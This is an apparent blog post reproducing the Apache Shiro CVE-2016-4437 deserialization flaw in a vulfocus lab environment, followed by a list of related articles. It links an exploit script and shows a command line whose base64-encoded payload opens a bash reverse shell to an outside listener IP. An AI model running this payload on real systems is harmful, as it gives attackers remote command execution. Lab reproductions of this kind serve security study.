shiro-cve_2016_4437漏洞复现

最新推荐文章于 2025-03-24 22:25:22 发布
最新推荐文章于 2025-03-24 22:25:22 发布
阅读量601 收藏
点赞数
分类专栏: 攻防 文章标签: 安全 网络 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/fairy1016/article/details/118927871
版权

漏洞概述:

该漏洞发布于2016年6月,属于java反序列化漏洞的一种,Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。

Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行序列化、AES加密、Base64编码操作。只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。

漏洞复现:

在vulfocus平台上拉取下载shiro-cve_2016_4437漏洞镜像,并运行漏洞环境
在这里插入图片描述
在浏览器访问使用root用户登录,并勾选Remember ME,点击登录
在这里插入图片描述
攻击脚本:https://download.youkuaiyun.com/download/fairy1016/20371436
将python 反弹shell命令通过网站http://www.jackson-t.ca/runtime-exec-payloads.html 编码
ip为下面用来监听的linux系统的ip,端口任意。
在这里插入图片描述
启用nc监听:
在这里插入图片描述

执行攻击poc:

python shiro_exploit.py -t 3 -u http://118.193.36.37:29577 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC82MC4yMDUuMTgzLjE1OS82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}"
在这里插入图片描述
成功拿到反弹shell
在这里插入图片描述

CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 2990
CVE-2016-4437 Shiro反序列化漏洞复现
[CVE-2016-4437] Apache Shiro 安全框架反序列化漏洞复现与原理详细分析
Specif1c的博客
10-21 5489
Apache Shiro是一个强大且易用的 Java安全框架,执行身份验证、授权、密码和会话管理。shiro 相比于 springsecurity 简单许多,官方号称 10 分钟就能学会。shiro 反序列化漏洞是 Java 经典漏洞,于2016年被挖掘出来,到现在依旧很多系统存在该漏洞,非常值得学习,对加深 shiro 认证机制的理解以及java代码审计颇有帮助。
Shiro框架漏洞攻略(CVE-2016-4437)
最新发布
2301_78554096的博客
03-24 360
 Shiro  rememberMe反序列化漏洞Shiro-550)
shiro反序列化漏洞(CVE-2016-4437)漏洞复现
HEAVEN569的博客
06-21 6137
本文对shiro反序列化漏洞(CVE-2016-4437),进行了分析复现,介绍了利用工具和常规修复方法
Apache shiro550 CVE-2016-4437复现
weixin_65582330的博客
03-20 1020
填好目标地址,然后爆破密钥,用已知的密钥库爆破,然后检测当前的利用链,再爆破利用链,利用链可以进行选择,一个不行就换下一个。apache shiro提供了登录信息保存的功能,服务器在验证用户身份的过程中有反序列化操作,这是导致漏洞的主要原因。随便输入账号密码进行抓包,可以看到有rememberme=remember-me,为shiro的特征。这时就会让服务器访问我们建立好的JRMP的服务,然后让服务器反弹连接到攻击机的7777端口。然后再手动复现一遍:下面是大概的利用方式。# 生成随机16位长度的IV。
【渗透测试】-CVE-2016-4437-Shiro550漏洞复现
weixin_65311462的博客
09-13 1209
Shiro550漏洞CVE-2016-4437)是Apache Shiro框架中的一个高危反序列化漏洞,主要影响版本为1.2.4及以前版本。该漏洞允许攻击者通过RememberMe功能实现远程代码执行(RCE)。及时更新Apache Shiro框架到最新版本,确保已修复该漏洞。对来自用户的输入进行严格的验证和过滤处理,以防止恶意代码的注入。使用安全的加密算法和密钥管理策略来保护敏感数据。
shiro反序列化漏洞详解与复现shiro-550/CVE-2016-4437
ccccai22的博客
08-28 363
shiro反序列化漏洞shiro-550/CVE-2016-4437
详细shiro漏洞复现及利用方法(CVE-2016-4437
热门推荐
dreamthe的博客
04-26 3万+
该篇文章比较详细的介绍shiro漏洞利用,无论是shiro漏洞图形化工具利用,还是shiro漏洞结合JRMP我觉得比大多数文章都详细,如果你对网上结合JRMP反弹shell不是很明白,非常推荐来看看这篇文章。另外漏洞利用工程中用到的工具以及代码都上传到百度网盘,供大家使用,在文章最后哦。
CVE-2020-13933 靶场: shiro 认证绕过漏洞.zip
01-14
在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
shiro CVE-2016-4437 漏洞复现
qq_40646572的博客
05-09 1046
shiro550漏洞漏洞点就在于用户信息反序列化可利用,并且加密的key值给了一个固定的默认值的,导致很多开发人员直接使用,接着导致了洞的产生。
Shiro-CVE-2016-4437 漏洞复现(vulhub靶场搭建)
zzxyccxc的博客
09-12 1114
Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会将用户信息加密,加密过程:用户信息=>序列化=>AES加密=>base64编码=>RememberMe Cookie值。
shiro反序列化漏洞复现CVE-2016-4437
m0_70349048的博客
05-19 722
cookie的key为RememberMe,cookie的值是经过相关信息进行序列化,然后使用AES加密(对称),最后再使用Base64编码处理。,这意味着攻击者只要通过源代码找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化,AES加密,Base64编码,然后将其作为cookie的Remember Me字段发送,Shiro将RememberMe进行解密并且反序列化,最终造成反序列化漏洞。将生成的payload复制到请求包cookie的位置, 发包。可以看到,已经能够远程执行任意命令了。
shiro反序列化漏洞复现CVE-2016-4437
wangzhifei1的博客
01-19 1979
Apache Shiro是一个强大且易于使用的Java安全框架,提供认证、授权、加密以及会话管理功能。CVE-2016-4437具体涉及了Apache Shiro在使用记住我(RememberMe)功能时的反序列化漏洞
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )
总有人间一两风,填我十万八千梦
03-28 1万+
Shiro 1.2.4 反序列化漏洞
CVE-2016-4437 Apache Shiro 反序列化漏洞复现
yzl_007的博客
07-26 521
Apache Shiro 反序列化漏洞复现CVE-2016-4437漏洞描述 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞。 使用burp抓包查看 漏洞原理 Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。 Shiro对rememberMe的cookie做了加密处理,shiro
漏洞复现Shiro rememberMe反序列化漏洞CVE-2016-4437
weixin_45556536的博客
11-11 1839
shrio反序列化漏洞 一、漏洞介绍 Shiro 是 Java 的一个安全框架。Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。 二、影响范围 Apache Shiro <= 1.2.4 三、漏洞复现 恶意 Cookie rememberMe值构造前1
CVE--2016-4437漏洞shiro漏洞复现
THZLYXX的博客
11-12 538
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性,可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的Web 和企业应用程序。
shiro反序列化漏洞复现(CVE-2016-4437)
huangyongkang666的博客
04-14 3912
shiro反序列化漏洞复现(CVE-2016-4437) 1.漏洞简介 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序 漏洞原理: 在Shiro <= 1.2.4中,反序列化过程中所用到的AES加密的key是硬编码在源码中,当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,接着base64编
分析Apache Shiro漏洞CVE-2020-17523的两种绕过方法
搭建这样的测试环境,需要对Shiro和Spring的集成有深入的理解,以确保能够正确复现漏洞,并进行后续的安全测试和验证。 POC测试: 文档中提到了两种绕过Shiro认证的姿势: 1. 第一种姿势描述了通过在HTTP请求中使用...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值